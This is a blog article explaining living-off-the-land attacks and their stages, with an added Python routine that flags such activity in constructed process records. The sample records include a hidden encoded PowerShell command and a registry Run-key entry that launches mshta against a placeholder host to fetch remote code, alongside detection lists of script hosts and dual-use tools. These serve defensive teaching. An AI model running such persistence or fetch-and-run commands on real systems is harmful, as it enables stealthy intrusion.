Office 1

Cyber Attacks - The Rise of Living off the Land Attacks

Written by Steve Ellis | September 20, 2019

Living off the land used to mean fending for yourself on the frontier, but in the digital age it has a much more sinister definition. Imagine your security network as a multi-layered and well-oiled machine that can fight off malicious attacks or halt them from spreading should they gain entry. For example, if a hacker gains access to one part of your network, that does not mean the hacker can gain access to everything. This is great for containing damage from unsecured areas, but living off the land (LotL) attacks are a bit nastier and can bypass this segmentation entirely.


What is LotL? 

LotL works by using a network’s own tools against it. In other words, an attacker extends their reach within a network by using the network’s own resources. This means that an attacker does not have to download malware onto a computer or network from outside and can instead turn the network itself into the weapon. This is also known as a “zero-footprint” or “fileless” attack, because little or no trace is left on disk for anti-virus software to pick up on. That makes LotL attacks hard to detect with traditional anti-virus software, and thus stealthier and potentially more dangerous.

With this method, a person or group attacking your network can move through the entire system using the tools already in place and can connect to any other machines that are also hooked up to it. All of these factors combined make LotL attacks highly effective. These attacks are not only stealthy to the security systems you have in place, but they move fast and can pass through many interconnected machines with minimal interference and with people hardly noticing.


What Exactly is Attacked? 

When attacking a network, hackers and other unsavory individuals will often seek to exploit any weakness or use alternative methods to breach it.

  • A memory-only approach loads the malicious code directly into a device’s memory. A restart clears it, but an unpatched computer is at constant risk of being reinfected over and over again.
  • Another approach is fileless persistence, which stores the malicious payload in the registry rather than in memory, where its effects can remain hidden and survive a system reboot.
  • Non-portable-executable (non-PE) file attacks use JavaScript, PowerShell, and Microsoft Office documents with macros or scripts. The malicious payload rides inside legitimate tools rather than in a separate executable.
  • Lastly, dual-use tools such as PsExec and other utilities that have a legitimate purpose in office workflows can be abused. These are attractive to attackers because their activity bypasses file scanning and other methods of protection.
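As an added example that is not part of the original article, the small triage routine below shows how a defender would look for the four patterns in this list in process-creation telemetry. It runs over constructed records (made-up hosts and command lines; the encoded PowerShell argument simply decodes to "ABC") and the field names are assumptions, not any particular product's schema.

```python
import re

# Constructed process-creation records, not real telemetry. The fields mirror
# what an EDR or Sysmon process-create event carries; the values are made up.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": "explorer.exe", "image": "outlook.exe",
     "cmdline": "outlook.exe"},
    # Office document spawning a script host with an encoded command
    {"host": "ws-01", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QQBCAEMA"},
    # dual-use tool: the PsExec service started on a server
    {"host": "srv-02", "parent": "services.exe", "image": "PSEXESVC.exe",
     "cmdline": "PSEXESVC.exe"},
    # fileless persistence: a Run key whose value launches a script host
    {"host": "ws-03", "parent": "cmd.exe", "image": "reg.exe",
     "cmdline": "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
                " /v upd /d \"mshta.exe http://example.invalid/x\""},
    {"host": "ws-04", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)
ENCODED_PS = re.compile(r"\s-(e|ec|enc|encodedcommand)\b")


def classify(ev):
    """Return the LotL category an event matches, or None if it looks benign."""
    img = ev["image"].lower()
    parent = ev["parent"].lower()
    cmd = ev["cmdline"].lower()
    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        return "non-PE: Office document spawning a script host"
    if img == "psexesvc.exe":
        return "dual-use tool: PsExec service started"
    if img == "reg.exe" and RUN_KEY.search(cmd) and any(h in cmd for h in SCRIPT_HOSTS):
        return "fileless persistence: Run key pointing at a script host"
    if img == "powershell.exe" and ENCODED_PS.search(cmd):
        return "non-PE: encoded PowerShell command line"
    return None


def triage(events):
    """Return (host, image, category) for every event that matches a LotL pattern."""
    return [(ev["host"], ev["image"], cat) for ev in events if (cat := classify(ev))]


if __name__ == "__main__":
    for host, image, category in triage(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {category}")
```

Rules like these are only a starting point; the value comes from baselining which parent/child pairs and which registry writes are normal in your own office before alerting on them.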


How Does it Happen?

LotL attacks happen in many ways but typically they occur in this progression: the attacker enters the network, the attacker moves through the system, and then the damage is dealt. 

Entering the network occurs when attackers use system tools, applications, or other typically unguarded areas of a network to gain access. They can also gain access through malicious emails (phishing) or stolen or guessed passwords. A company’s third-party applications, such as a VPN or trusted off-the-shelf programs that come installed on the computer, are targeted because they are often not the focus of the security network, and because using these tools to gain access adds a layer of protection and stealth for the attacker. These tools also usually run with system administrator privileges and are used commonly throughout an office, so activity coming from them usually goes unnoticed. A LotL attacker hides in plain sight and continues to travel up the network hierarchy.


A LotL attack will work its way up the network’s food chain, looking for the cookie jar: the place where data can be stolen or operations can be damaged. By creating new administrator accounts and going through each computer, a LotL attack solidifies its place within the network it has compromised and grants itself sweeping access throughout the system. This kind of attack will also likely change administrator settings, furthering its control and protecting itself ahead of the final step.

The final step is for the attacker or attackers to ultimately do what they set out to do when they breached your network. Usually, attackers go for identity theft, which leads to major damage to your office’s work capabilities and equipment. However, over the past 18 months there has been a shift from identity theft to ransomware.


There have been cases where a company brags about the amount of cybersecurity insurance it carries, only to be ransomed for that exact amount. As long as the LotL attacker still retains administrator privileges or is still lingering in the network, there is always a risk.


Attackers Never Sleep

Cyber-security is always changing. Attackers never stick to one consistent way of exploiting secure networks. LotL-style attacks are growing because they are highly effective and are a ready way for attackers to bypass and circumvent the strengthening of modern security networks. A strong network is no reason to let your guard down. This style of attack is a direct counter to those who decide not to be proactive in their network defense. LotL attacks are on the rise and are becoming the next preferred method of attack. By knowing what LotL is and how it operates, you have the best chance of defending your personal information and keeping your office secure.